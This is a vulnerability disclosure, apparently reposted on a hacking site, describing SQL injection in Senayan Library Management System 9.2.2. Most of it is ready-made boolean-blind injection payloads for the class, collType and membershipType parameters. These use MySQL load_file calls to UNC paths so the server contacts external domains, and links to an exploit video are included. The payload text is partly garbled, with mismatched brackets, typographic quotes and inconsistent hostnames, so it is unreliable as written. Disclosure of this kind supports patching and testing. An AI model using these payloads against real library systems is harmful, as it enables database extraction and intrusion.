![Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]](https://www.ineedhack.com/wp-content/uploads/2023/01/Course-content-16-360x180.png)
## Title, Senayan Library Management System (v9.2.2) a.k.a. SLIMS 9 Multiple SQLi – Not sanitizing properly cookie session.
## Author: nu11secur1ty
## Date: 12.20.2022
## Vendor: https://slims.web.id/web/
## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.2.2
## Reference:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2/SQLi
## Description:
SQL vulnerability appears to exist in the manual insertion of points 3, 4 and 5.
injection attacks. Payload: ‘+ (select load_file
azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.stupid.comdzd’))+’ was submitted
In the manual insertion, point 3.
This payload inserts an SQL sub-query to call MySQL’s load_file operation
With a UNC File Path that refers to an URL on an External Domain
Manual testing has revealed that the parameters collType, class and membershipType have been successfully tested.
SQLi attack possible
It was evident that the application communicated with this domain.
SQL query executed.
An attacker could access all the database columns in this system.
This vulnerability can be exploited.
Cookies not properly sanitized
## STATUS: HIGH Vulnerability
[+] Payload:
“`MySQL
00
—
Parameter: Class (GET).
Type: Boolean-based blind
Title: MySQL RLIKE blind, boolean-based – WHERE HAVING ORDER BY
GROUP BY clause
Payload: reportView=true&year=2002&class=bbbb’+(select load_file(‘
716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.idnbq’))+”+(select
load_file(‘1rtb9wq2997df8x4x2cdtmp4kvqoee255twjjb70.slims.web.idavg’))+”
RLIKE (SELECT CASE WHEN (2920=2920), THEN 0x62626262+ (select
load_file(0x5c5c5c5c37313667623163666539676b6a61347a646a34357178783932303876776c6b636e30656e3662762e736c696d732e7765622e69645c5c6e6271))+”+(select
load_file(0x5c5c5c5c3172746239777132393937646638783478326364746d70346b76716f656532353574776a6a6237302e736c696d732e7765622e69645c5c617667))+”
ELSE 0x28 END)) AND ‘xMPZ’=’xMPZ&membershipType=a”&collType=aaaa’+(select
load_file(‘dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.idwtf’))+”+(select
load_file(‘azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id
dzd’))+’
—
01
—
Parameter: CollType (GET).
Type: Boolean-based blind
Title: MySQL RLIKE blind, boolean-based – WHERE HAVING ORDER BY
GROUP BY clause
Payload: reportView=true&year=2002&class=bbbb’+(select load_file(‘
716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.idnbq’))+”+(select
load_file(‘1rtb9wq2997df8x4x2cdtmp4kvqoee255twjjb70.slims.web.idavg’))+’&membershipType=a”&collType=aaaa’+(select
load_file(‘dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.idwtf’))+”+(select
load_file(‘azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.iddzd’))+”
RLIKE(SELECT (CASE WHEN (227=2279), THEN (0x61616161611)+(select
load_file(0x5c5c5c5c646374697930687a69777a643478756a6671716366643375756c306b6f61633166703666743968792e736c696d732e7765622e69645c5c777466))+”+(select
load_file(0x5c5c5c5c617a6469746d3536316837666b7533796a39397573386e653235387a77706b676e346575316f70642e736c696d732e7765622e69645c5c647a64))+”
ELSE 0x28 END)) AND ‘MGZY’=’MGZY
—
03
—
Parameter: MembershipType (GET).
Type: Boolean-based blind
Title: MySQL RLIKE blind, boolean-based – WHERE HAVING ORDER BY
GROUP BY clause
Payload: reportView=true&year=2002&class=bbbb’+(select load_file(‘
716gb1cfe9gkja4zdj45qxx9208vwlkcn0en6bv.slims.web.idnbq’))+”+(select
load_file(‘1rtb9wq2997df8x4x2cdtmp4kvqoee255twjjb70.slims.web.idavg’))+’&membershipType=a”’
RLIKE [SELECT (CASE WHEN (7628) =7628) THEN (0x612727) ELSE (0x28 End)) AND
‘ckmk’=’ckmk&collType=aaaa’+(select load_file(‘
dctiy0hziwzd4xujfqqcfd3uul0koac1fp6ft9hy.slims.web.idwtf’))+”+(select
load_file(‘azditm561h7fku3yj99us8ne258zwpkgn4eu1opd.slims.web.id
dzd’))+’
—
“`
## Reproduce:
[href](
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.2.2/SQLi
)
## Reference:
[Using HTTP Cookies] (
https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies)
## Evidence and Exploit
[href](https://streamable.com/1m0y6c)
## Time spent
`00:35:00`
## Write an exploit
`00:15:00`
